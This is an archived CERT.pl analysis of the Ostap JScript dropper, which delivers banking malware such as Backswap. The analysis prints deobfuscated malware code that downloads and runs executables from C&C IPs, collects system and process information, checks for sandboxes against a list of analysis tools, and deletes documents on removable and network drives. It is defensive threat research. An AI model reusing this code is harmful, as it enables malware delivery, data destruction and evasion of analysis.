{
	"id": "dd60bf7a-5ce6-4fe7-9b43-fe878f28c86e",
	"created_at": "2026-04-06T00:18:59.974033Z",
	"updated_at": "2026-04-10T03:21:40.724958Z",
	"deleted_at": null,
	"sha1_hash": "b224dcbbd8f5068ca670ef21e0b3d212595f4fb6",
	"title": "Ostap malware analysis (Backswap dropper)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 274766,
	"plain_text": "Ostap malware analysis (Backswap dropper)\r\nArchived: 2026-04-05 22:02:13 UTC\r\nMalicious scripts, distributed via spam e-mails, have been getting more complex for some\r\ntime. Usually, if you got an e-mail with .js attachment, you could safely assume it’s just a\r\nsimple dropper, which is limited to downloading and executing malware. Unfortunately,\r\nthere is a growing number of campaigns these days, where script doesn’t exit after\r\ndownloading sample. Instead of ending its life – it remains active, waiting for additional\r\ncommands or more samples to fetch. Some of the examples are: vjw0rm used in Vortex\r\nransomware campaigns and Ostap – the main protagonist of our story.\r\nThis article is an introduction to Backswap malware analysis, which is a second-stage\r\nmalware downloaded by Ostap. Our analysis of Backswap malware will be published\r\nsoon!\r\nOstap has became a very popular malware worldwide, but the most interesting campaigns\r\nobserved by CERT.pl occured in Poland. It is mostly used for banking malware distribution.\r\nCurrently it distributes two banker families simultaneously: Nymaim and Backswap, which\r\nis actually slightly modified Tinba. Because both malware families are dropped at the same\r\ntime, there is specific correlation between them – noticed by ESET in their Backswap\r\nanalysis. Analysis of both banker families can be also found on our webpage.\r\nhttps://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/\r\nPage 1 of 19\n\nScript is delivered as a compressed attachment (fake invoice). It has an .rar extension, but\r\ndon’t be fooled – actually it’s an ACE archive. This is a very usual technique, used to\r\nmislead some automatic analyzers, which identify a file type by its extension. Despite that,\r\nWinRAR is able to recognize the real archive format, so victims don’t have any problems to\r\nexecute the Ostap script using that software.\r\n2e2096cbf17506a19e0389281333a3e2 FV-028534679112.rar\r\nContents of archive FV-028534679112.rar\r\nDate Time Packed Size Ratio File\r\n28.05.18 23:20 33712 631230 5% FV-024209564418.jse\r\nlisted: 1 files, totaling 631.230 bytes (compressed 33.712)\r\nThe archive contains a JSE file, which is an encoded JScript. Because of the obfuscation\r\nmethod used (characteristic for this malware), file is rather large, and can exceed several\r\nhundred kilobytes in size.\r\nFirst Ostap campaigns (2016)\r\nFirst campaigns were observed by CERT.pl in May 2016. In the first versions, Ostap was just\r\na simple dropper, which uninstalls itself after completing its mission. The characteristic part\r\nwas the obfuscation method mentioned before – strings were completed char-by-char using\r\ncomplex expressions evaluated by JScript interpreter.\r\npre_Additionally6=this[{y3:'\\u0041'}.y3+{RL02:'\\u0063'}.RL02+\r\n{ar1:'\\u0074'}.ar1+{ar1:'\\u0069'}.ar1+{non0:'\\u0076'}.non0+{art1:'\\u0065'}.art1+\r\n{es3:'\\u0058'}.es3+{ls1:'\\u004f'}.ls1+{n0:'\\u0062'}.n0+{r0:'\\u006a'}.r0+\r\nhttps://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/\r\nPage 2 of 19\n\n{erv1:'\\u0065'}.erv1+{h0:'\\u0063'}.h0+{nfo3:'\\u0074'}.nfo3];var\r\npre_communicating=this[{ay1:'\\u0057'}.ay1+{den0:'\\u0053'}.den0+\r\n{n1:'\\u0063'}.n1+{ers3:'\\u0072'}.ers3+{ont1:'\\u0069'}.ont1+{tor1:'\\u0070'}.tor1+\r\n{ay0:'\\u0074'}.ay0];\r\nAfter deobfuscation:\r\nvar pre_Additionally6 = this['ActiveXObject'];\r\nvar pre_information = WScript.CreateObject('WScript.Shell');\r\nvar pre_full = new ActiveXObject('Scripting.FileSystemObject');\r\nvar fstream = new ActiveXObject('ADODB.Stream');\r\nvar oShell = new ActiveXObject('Shell.Application');\r\nvar pre_sources = pre_information['ExpandEnvironmentStrings']('%TEMP%');\r\nvar filepath = pre_sources + '\\\\\\\\' + Math['floor'](Math['random']() * (20 + 20 + 5 + 5\r\n+ 25 + 25) + 1) + '.exe';\r\nvar pre_information6 = new ActiveXObject('Msxml2.ServerXMLHTTP');\r\nvar body12 = '\\\\aflash_update.js';\r\nvar startupFolder = oShell['NameSpace'](7);\r\nvar pre_that = false;\r\nvar pre_with = false;\r\nvar tone = 1;\r\nvar filets = null;\r\nvar pre_with = WScript.ScriptFullName;\r\nvar pre_includes = startupFolder.Self.Path + body12;\r\nvar pre_computer9 = 'https://217.28.218.217/YOP634EFARRR/q64.php?\r\nadd=gtyhbncdfewpnjm9oklmnfdrtqdczdfgrt';\r\nif (pre_with != pre_includes \u0026\u0026 pre_that == false) {\r\npre_that = true;\r\npre_full['DeleteFile'](pre_with);\r\nWScript.echo('The document is corrupted and cannot be opened');\r\nhttps://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/\r\nPage 3 of 19\n\nWScript.Sleep(5000);\r\n}\r\nwhile (true) {\r\ntone = tone + 1;\r\nif (tone == 300000000) {\r\nwhile (true) {\r\ntry {\r\npre_information6['setOption'](3, 'MSXML');\r\npre_information6['open']('GET', pre_computer9 + '\u0026' + Math['floor'](Math['random']\r\n() * 200 + 1), false);\r\npre_information6['send']();\r\nif (pre_information6['status'] == 200) {\r\nif (pre_full['FileExists'](filepath))\r\npre_full['DeleteFile'](filepath);\r\nfstream['Open']();\r\nfstream['Type'] = 1;\r\nfstream['Write'](pre_information6['responseBody']);\r\nfstream['Position'] = 0;\r\nfstream['SaveToFile'](filepath);\r\nfstream['Close']();\r\nfilets = pre_full['GetFile'](filepath)['OpenAsTextStream'](1);\r\nif (pre_full['FileExists'](filepath) \u0026\u0026 filets['ReadLine']()['substring'](0, 2) == 'MZ') {\r\npre_with = true;\r\noShell['ShellExecute'](filepath, '', '', 'open', '1');\r\nif (pre_full['FileExists'](WScript['ScriptFullName']))\r\npre_full['DeleteFile'](WScript['ScriptFullName']);\r\nWScript.Sleep(4000);\r\nhttps://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/\r\nPage 4 of 19\n\nif (pre_full['FileExists'](filepath))\r\npre_full['DeleteFile'](filepath);\r\n}\r\nfilets['Close']();\r\n}\r\n} catch (e) {\r\n}\r\nif (pre_with == true) {\r\nbreak;\r\n}\r\nWScript.Sleep(80000);\r\n}\r\nbreak;\r\n}\r\n}\r\nDuring execution – script was performing few actions:\r\nShows message The document is corrupted and cannot be opened\r\nAdds itself to the Startup folder oShell[‘NameSpace’](7), which ensured automatic\r\nexecution on logon (in case the file was not available immediately)\r\nTries to download and execute EXE file from URL\r\nhttps://217.28.218.217/YOP634EFARRR/q64.php?\r\nadd=gtyhbncdfewpnjm9oklmnfdrtqdczdfgrt\u0026\u003crandom number\u003e. In case of failure –\r\nit tries again every 80 seconds.\r\nAfter successful download and instalation – removes itself from Startup and deletes\r\ndownloaded file, ending its existence on compromised host.\r\nSo, at first, Ostap was just simple dropper, but pretty characteristic (e.g. because of add=\r\nargument containing campaign identifier, obfuscation, URL format). Samples downloaded\r\nby Ostap weren’t usually available immediately after the beginning of the campaign and they\r\nwere distributed only for a short period of time. Downloaded malware samples were usually\r\nbankers: KBot and Gozi ISFB\r\nhttps://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/\r\nPage 5 of 19\n\nA month later – in June 2016, we found next version of Ostap, sending additional\r\ninformation about victim environment.\r\nvar pre_written = 'https://217.29.58.174:4433/MIKE/ostap.php?\r\nadd=fty7ygvhuijhbvfdew2erfvghu8ujhvfcdxe4r5t6y';\r\nvar char123 = '\\\\';\r\nvar pre_imagery = temp12 + char123 + Math.floor(Math.random() * (50 + 50) + 1) +\r\n'.exe';\r\nvar pre_dawn = temp12 + char123 + Math.floor(Math.random() * (50 + 50) + 1) +\r\n'.xmp';\r\nvar pre_right = new pre_known('Msxml2.ServerXMLHTTP');\r\nvar body12 = char123 + 'adobe_update.js';\r\n// ...\r\nvar hashhere = 0;\r\nvar autor = startupFolder.Self.Path + body12;\r\nvar uidhere = autor;\r\nuidhere = uidhere + pre_voices['Environment']('PROCESS')['Item']\r\n('COMPUTERNAME');\r\nfor (pre_either10 = 0; pre_either10 \u003c uidhere.length; pre_either10++) {\r\nhashhere = (hashhere \u003c\u003c 5) - hashhere + uidhere['charCodeAt'](pre_either10) \u0026\r\n4294967295;\r\n}\r\npre_right['setOption'](1 + 2, 'MSXML');\r\npre_right['open']('GET',\r\npre_written +\r\n'\u0026' + Math['floor'](Math['random']() * 100 + 1) +\r\n'\u0026uid=' + Math['abs'](hashhere) +\r\nhttps://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/\r\nPage 6 of 19\n\n'\u0026out=' + out123 +\r\n'\u0026ver=' + pre_either10, false);\r\npre_right['send']();\r\nC\u0026C address was slightly different and contained more fields:\r\nhttps://\u003cip:port\u003e/\u003cpath .php\u003e?add=\u003ccampaign id\u003e\u0026\u003crandom\u003e\u0026uid=\u003cvictim\r\nid\u003e\u0026out=\u003c0|1\u003e\u0026ver=\u003cversion\u003e\r\nMeaning of each field is described below:\r\nhash from the Startup path and computer name (uid)\r\noperating system version (based on Users substring existence in %HOMEPATH%) –\r\nver\r\nadditional request was sent after successful download (out=1)\r\nC\u0026C was delivering malware encoded in Base64. Ostap was perfoming some decoding\r\nusing the built-in certutil command. Also, new version contained some fail-safe methods of\r\nmalware execution:\r\nout = 1;\r\ntry {\r\npre_head = pre_voices['Exec'](pre_imagery);\r\nout = pre_head['ProcessID'];\r\n} catch (e) {\r\ntry {\r\noShell['ShellExecute'](pre_imagery, '', '', 'open', 0);\r\nout = 2;\r\n} catch (e) {\r\ncmd12 = cmd12 + pre_imagery;\r\noShell['ShellExecute']('%COMSPEC%', cmd12, '', 'open', 0);\r\nout = 3;\r\n}\r\n}\r\nhttps://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/\r\nPage 7 of 19\n\nCriminals were showing their (kind of) creativity, sometimes adding a bitmap file to ACE\r\narchives.\r\nA few months later, script started to deliver various types of banking malware such as Tinba,\r\nRamnit or ISFB. Since then, Ostap (named after ostap.php script name) was slowly\r\nbecoming serious piece of malware.\r\nBecause of the variety of samples and number of parallel campaigns, we began to suspect\r\nthat Ostap is used as distribution service and delivered software is not associated with single\r\nactor. From 2016, Ostap was getting more and more active.\r\nDropper evolves to botnet (2017)\r\nFrom the half of 2017, Ostap became more powerful. The first thing developed in 2017\r\nversion were several anti-analysis techniques.\r\nGathering information about execution environment\r\nBefore Ostap launches – malware executes WMI query, requesting for active processes list,\r\nuser name, domain name, version of operating system etc.\r\nvar sysInfo = \"\";\r\nvar procInfo = \"\";\r\nobj00WMI = GetObject(\"winmgmts:\r\n{impersonationLevel=impersonate}!\\\\\\\\.\\\\root\\\\cimv2\");\r\nwin32Process = new Enumerator(obj00WMI[\"ExecQuery\"](\"Select * from\r\nWin32_Process\"));\r\nhttps://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/\r\nPage 8 of 19\n\nwin32OperatingSystem = new Enumerator(obj00WMI[\"ExecQuery\"](\"Select * from\r\nWin32_OperatingSystem\"));\r\nwhile (!win32OperatingSystem[\"atEnd\"]()) {\r\nsysInfo = sysInfo + win32OperatingSystem[\"item\"]()[\"Caption\"] +\r\nwin32OperatingSystem[\"item\"]()[\"Version\"];\r\nwin32OperatingSystem[\"moveNext\"]();\r\n}\r\nwhile (!win32Process[\"atEnd\"]()) {\r\nprocessItem = win32Process[\"item\"]();\r\nprocessOwner = processItem[\"ExecMethod_\"](\"GetOwner\");\r\nprocInfo = procInfo + processItem[\"Name\"] + \"*\" +\r\nprocessItem[\"ExecutablePath\"] + \"*\" +\r\nprocessOwner[\"Domain\"] + \"|\" +\r\nprocessOwner[\"User\"] +\r\nString[\"fromCharCode\"](13) + String[\"fromCharCode\"](10);\r\nwin32Process[\"moveNext\"]();\r\n}\r\nOutput from sysInfo and procInfo is then concatenated:\r\nMicrosoft Windows XP Professional5.1.2600\r\nSystem Idle Process*null*DESKTOP_XXXXX|Zosia\r\nSystem*null*DESKTOP_XXXXX|Zosia\r\nsmss.exe*C:\\WINDOWS\\System32\\smss.exe*DESKTOP_XXXXX|Zosia\r\ncsrss.exe*null*DESKTOP_XXXXX|Zosia\r\nwinlogon.exe*C:\\WINDOWS\\system32\\winlogon.exe*DESKTOP_XXXXX|Zosia\r\nservices.exe*C:\\WINDOWS\\system32\\services.exe*DESKTOP_XXXXX|Zosia\r\nlsass.exe*C:\\WINDOWS\\system32\\lsass.exe*DESKTOP_XXXXX|Zosia\r\nsvchost.exe*C:\\WINDOWS\\system32\\svchost.exe*DESKTOP_XXXXX|Zosia\r\nhttps://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/\r\nPage 9 of 19\n\nsvchost.exe*null*DESKTOP_XXXXX|Zosia\r\nsvchost.exe*C:\\WINDOWS\\System32\\svchost.exe*DESKTOP_XXXXX|Zosia\r\nsvchost.exe*null*DESKTOP_XXXXX|Zosia\r\nsvchost.exe*null*DESKTOP_XXXXX|Zosia\r\nspoolsv.exe*C:\\WINDOWS\\system32\\spoolsv.exe*DESKTOP_XXXXX|Zosia\r\nexplorer.exe*C:\\WINDOWS\\Explorer.EXE*DESKTOP_XXXXX|Zosia\r\nctfmon.exe*C:\\WINDOWS\\system32\\ctfmon.exe*DESKTOP_XXXXX|Zosia\r\nmsmsgs.exe*C:\\Program Files\\Messenger\\msmsgs.exe*DESKTOP_XXXXX|Zosia\r\nsvchost.exe*null*DESKTOP_XXXXX|Zosia\r\nalg.exe*null*DESKTOP_XXXXX|Zosia\r\nwscntfy.exe*C:\\WINDOWS\\system32\\wscntfy.exe*DESKTOP_XXXXX|Zosia\r\nsvchost.exe*C:\\WINDOWS\\System32\\svchost.exe*DESKTOP_XXXXX|Zosia\r\ndllhost.exe*C:\\WINDOWS\\system32\\dllhost.exe*DESKTOP_XXXXX|Zosia\r\nmsdtc.exe*null*DESKTOP_XXXXX|Zosia\r\ncmd.exe*C:\\WINDOWS\\system32\\cmd.exe*DESKTOP_XXXXX|Zosia\r\nwmiprvse.exe*null*DESKTOP_XXXXX|Zosia\r\nwscript.exe*C:\\WINDOWS\\system32\\wscript.exe*DESKTOP_XXXXX|Zosia\r\nThen, Ostap looks for occurences of several names characteristic for analysis tools and\r\nsandbox environments:\r\nif (procInfo[\"indexOf\"](\"Procmon\") != -1 ||\r\nprocInfo[\"indexOf\"](\"Wireshark\") != -1 ||\r\nprocInfo[\"indexOf\"](\"Temp\\\\iexplore.exe\") != -1 ||\r\nprocInfo[\"indexOf\"](\"ProcessHacker\") != -1 ||\r\nprocInfo[\"indexOf\"](\"vmtoolsd\") != -1 ||\r\nprocInfo[\"indexOf\"](\"VBoxService\") != -1 ||\r\nprocInfo[\"indexOf\"](\"python\") != -1 ||\r\nhttps://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/\r\nPage 10 of 19\n\nprocInfo[\"indexOf\"](\"Proxifier.exe\") != -1 ||\r\nprocInfo[\"indexOf\"](\"Johnson-PC\") != -1 ||\r\nprocInfo[\"indexOf\"](\"ImmunityDebugger.exe\") != -1 ||\r\nprocInfo[\"indexOf\"](\"lordPE.exe\") != -1 ||\r\nprocInfo[\"indexOf\"](\"ctfmon.exe*JOHN-PC\") != -1 ||\r\nprocInfo[\"indexOf\"](\"BehaviorDumper\") != -1 ||\r\nprocInfo[\"indexOf\"](\"anti-virus.EXE\") != -1 ||\r\nprocInfo[\"indexOf\"](\"AgentSimulator.exe\") != -1 ||\r\nprocInfo[\"indexOf\"](\"VzService.exe\") != -1 ||\r\nprocInfo[\"indexOf\"](\"VmRemoteGuest\") != -1 ||\r\nprocInfo[\"indexOf\"](\"SystemIT|admin\") != -1)\r\n{\r\ndocument[\"alert\"](\"Screw you guys, Im going home!!!!\");\r\n}\r\nIf a characteristic name is found, Ostap calls document.alert method. Object document\r\ndoesn’t exist in Windows Script Host context (it is seen only in web browsers) which raises\r\nan unhandled exception, stopping the execution.\r\nAfter gathering information from WMI – script copies itself to Startup and goes to the main\r\npart.\r\nCommunication with C\u0026C (downloading malicious samples)\r\nURL pattern used by Ostap from 2017 was very similar. However, few communication\r\naspects changed from the 2016 version.\r\nRequest method changed from GET to POST\r\nOstap sends fetched sysInfo+procInfo as request body\r\nArgument names were shortened (uid becomes u)\r\nC\u0026C server sends additional information about blob format and method of sample\r\nexecution:\r\nFile could be sent raw or Base64-encoded (Content-Transfer-Encoding was set to\r\nbinary or base64)\r\nhttps://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/\r\nPage 11 of 19\n\nThere were few methods of execution, based on you_god_damn_right HTTP response\r\nheader value (actual name differs depending on the malware version)\r\nYup, Ostap is full of “Breaking bad” quotes.\r\nPossible values of you_god_damn_right are:\r\n0 – file is an update (replace the original script and execute, closing itself)\r\n1 – run DLL file (with secretFunction as entrypoint)\r\n2 – install software silently with Administrator privileges (MSI installer)\r\nBy default, fetched file was run using cmd /c start \u003cfile path\u003e\r\nAfter successful installation – script removes all files from TEMP folder which were\r\npotentially associated with fetched sample (.exe, .gop – base64 encoded, .txt, .log, *.jse –\r\nupdate)\r\nDestructive propagation on removable media and network shares\r\nIf creation of file after download was unsuccessful (file still doesn’t exist under expected\r\nlocation) – Ostap becomes more nasty than usual.\r\nvar fso = new ActiveXObject(\"Scripting.FileSystemObject\");\r\nvar extensions = \"*.doc *.xls *.pdf *.rtf *.txt *.pub *.odt *.ods *.odp *.odm *.odc\r\n*.odb *.wps *.xlk *.ppt *.mdb *.accdb *.pst *.dwg *.dxf *.dxg *.wpd\";\r\nvar wshShell = WScript[\"CreateObject\"](\"WScript.Shell\");\r\nvar tempDir = wshShell[\"ExpandEnvironmentStrings\"](\"%TEMP%\");\r\nhttps://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/\r\nPage 12 of 19\n\nvar userProfile = wshShell[\"ExpandEnvironmentStrings\"](\"%USERPROFILE%\");\r\nvar DRIVE_REMOVABLE = 1;\r\nvar DRIVE_NETWORK = 3\r\nvar listFileName = \"saymyname.txt\";\r\nif (!fso[\"FileExists\"](droppedFileName)) {\r\ntry {\r\ndrives = new Enumerator(fso.Drives);\r\nfor (;!drives[\"atEnd\"](); drives[\"moveNext\"]()) {\r\ndriveItem = drives[\"item\"]();\r\nif (driveItem[\"IsReady\"] \u0026\u0026\r\n(driveItem[\"DriveType\"] == DRIVE_NETWORK || driveItem[\"DriveType\"] ==\r\nDRIVE_REMOVABLE) \u0026\u0026\r\nuserProfile[\"substring\"](0, 1) != driveItem[\"DriveLetter\"])\r\n{\r\noShell23[\"ShellExecute\"](\"cmd\", \"/U /Q /C cd /D \" + graplingmore67[\"DriveLetter\"]\r\n+ \": \u0026\u0026 dir /b/s/x \" + extensions + \"\u003e\u003e%TEMP%\\\\\" + listFile, \"\", \"open\", 0);\r\nWScript[\"Sleep\"](90000);\r\n}\r\n}\r\nWScript[\"Sleep\"](30000);\r\nlistFile = fso[\"GetFile\"](tempDir + \"\\\\\" + listFile)[\"OpenAsTextStream\"](1, -1);\r\nwhile (!listFile[\"AtEndOfStream\"]) {\r\nfileToReplace = listFile[\"ReadLine\"]();\r\nnamePart = fileToReplace[\"substring\"](0, fileToReplace[\"indexOf\"](\".\"));\r\noShell23[\"ShellExecute\"](\"cmd\", \"/U /Q /C copy /Y \\\"\" + selfFile + \"\\\" \\\"\" +\r\nnamePart + \".jse\\\" \u0026\u0026 del /Q/F \\\"\" + fileToReplace + \"\\\"\", \"open\", 0);\r\n}\r\nhttps://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/\r\nPage 13 of 19\n\nlistFile[\"Close\"]();\r\nfso[\"DeleteFile\"](tempDir + '\\\\' + listFile);\r\n} catch (zsxdcfvgbhnj) {}\r\nout123 = 0;\r\ngraplingprimarily24 = false;\r\ncontinue;\r\n}\r\nAt the beginning, script was preparing a list of files with specified extensions, which are\r\nlocated on removable media and mounted network shares. List of files found was written to\r\ntemporary file saymyname.txt.\r\nThen, based on that list – all files were deleted and replaced by Ostap copy (with preserved\r\nname and added .jse extension). The purpose was probably to “punish” incautious analysts,\r\nwhich can accidentally trigger that code by script modifications.\r\nhttps://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/\r\nPage 14 of 19\n\nPersistence\r\nStarting from 2017, Ostap doesn’t erase itself after successful download anymore. Using\r\nself-update capabilities, malware persists on infected machine, serving banking malware\r\nfrom various families. The victim becomes a part of distribution botnet.\r\nCurrent version (2018)\r\nCurrently, Ostap is one of the most active families targeting the online banking customers in\r\nPoland. Malware code is being constantly developed and improved.\r\nVersion from 2018 has added few more methods of sandbox detection:\r\nMalware doesn’t execute on Windows XP\r\nhttps://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/\r\nPage 15 of 19\n\nOstap verifies length of process list (\u003e1500 characters is needed, which was efective\r\nagainst emulation using tools like box-js)\r\nFew strings were added to blacklist:\r\nMicrosoft Windows XP\r\n2B.exe\r\nProcmon\r\nWireshark\r\nTemp\\iexplore.exe\r\nProcessHacker\r\nvmtoolsd\r\nVBoxService\r\npython\r\nProxifier.exe\r\nJohnson\r\nImmunityDebugger.exe\r\nlordPE.exe\r\nctfmon.exe*JOHN-PC\r\nBehaviorDumper\r\nanti-virus.EXE\r\nAgentSimulator.exe\r\nVzService.exe\r\nVBoxTray.exe\r\nVmRemoteGuest\r\nSystemIT|admin\r\nWIN7-TRAPS\r\nEmily\\AppData\r\nPROCMON\r\nprocexp\r\nhttps://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/\r\nPage 16 of 19\n\ntcpdump\r\nFrzState2k\r\nDFLocker64\r\nvmware\r\nLOGSystem.Agent.Service.exe\r\nC:\\Users\\user\\\r\nC:\\Users\\milozs\\\r\nIf a sandbox substring was detected:\r\nMalware executes ploha[‘show’](‘No more half-measures.’); which triggers\r\nundefined variable exception (ploha doesn’t exist in the code)\r\nIf exception is not raised (or handled externally) – Ostap tries to terminate script\r\nusing WScript.Quit()\r\nIf script is still working – “destructive propagation” is activated\r\nDestructive propagation has additional condition now – if file creation was unsuccessful and\r\nsandbox was detected without script termination, malware starts removing files.\r\nThe URL address was also slightly changed:\r\nhttps://185.159.82.230/gazprom8/milertut.php?\r\nDeretghrttLolookest75=awsedrftgyhujiko\u0026add=james\u0026u=\u003cuid\u003e\u0026o=\u003cout\u003e\u0026v=\r\n\u003cver\u003e\u0026s=\u003crandom\u003e\r\nNow, the add parameter isn’t the campaign identifier – that role is taken over by\r\nDeretghrttLolookest75=awsedrftgyhujiko, which changes depending on the sample.\r\nIn latest version – HTTP execution method header is also different:\r\nWe_are_done_when_I_say_we_are_done, as well as message displayed after executing\r\nscript first time, which changed to PDF Error: The document could not be printed..\r\nhttps://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/\r\nPage 17 of 19\n\nSummary\r\nOstap shows how simple dropper script can evolve into real botnet malware. In summary,\r\nhere is the listing of characteristic elements for Ostap malware:\r\nDistribution via large-sized JSE files, delivered as ACE archives with .rar extension\r\nMessage showed after first execution of script (PDF Error: The document could not\r\nbe printed.)\r\nCharacteristic script obfuscation method\r\nPersistence (self-update capabilities, adding itself to Startup folder)\r\nUnusual URL pattern https://\u003cip[:port]\u003e/\u003cpath\u003e.php?\u003ccampaign_id1\u003e=\r\n\u003ccampaign_id2\u003e\u0026add=james\u0026(arguments…)\r\nAdditional information\r\nExample samples:\r\nb48f7f004d1b4be1d5efa5fe838d202762f7e94a2f084e21f946d53de2521ce4\r\nkopie_dokumenty.ace (2016, q64.php)\r\n4d618f3aa7990cc5013fb7f453311c058781cf7b1702f9ac3676aecda6e2c94e\r\nF.2016.06-07.ace (2016, ostap.php)\r\nb62f86ef5ef2086844b84ff6ac508c160ddeea94eee18648c86bcee129721b96\r\ndropper.jse (2017)\r\nb790331a334e896c74f6e7f919895f1ee6cdd05a30c305b199e82386e71862b4\r\nFV_030710645018.ace (2018)\r\nSamples after deobfuscation:\r\nhttps://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/\r\nPage 18 of 19\n\n2016-q64\r\n2016-ostap\r\n2017\r\n2018\r\nOstap was mentioned frequently in various articles (as “interesting dropper” or\r\n“JS/Nemucod”):\r\nhttp://www.pentestingexperts.com/reverse-engineering-a-javascript-obfuscated-dropper/\r\nhttps://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/JS_NEMUCOD.ELDSAUGH\r\nhttps://www.joesandbox.com/analysis/36716/0/html\r\nSource: https://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/\r\nhttps://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/\r\nPage 19 of 19",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/"
	],
	"report_names": [
		"ostap-malware-analysis-backswap-dropper"
	],
	"threat_actors": [],
	"ts_created_at": 1775434739,
	"ts_updated_at": 1775791300,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b224dcbbd8f5068ca670ef21e0b3d212595f4fb6.pdf",
		"text": "https://archive.orkl.eu/b224dcbbd8f5068ca670ef21e0b3d212595f4fb6.txt",
		"img": "https://archive.orkl.eu/b224dcbbd8f5068ca670ef21e0b3d212595f4fb6.jpg"
	}
}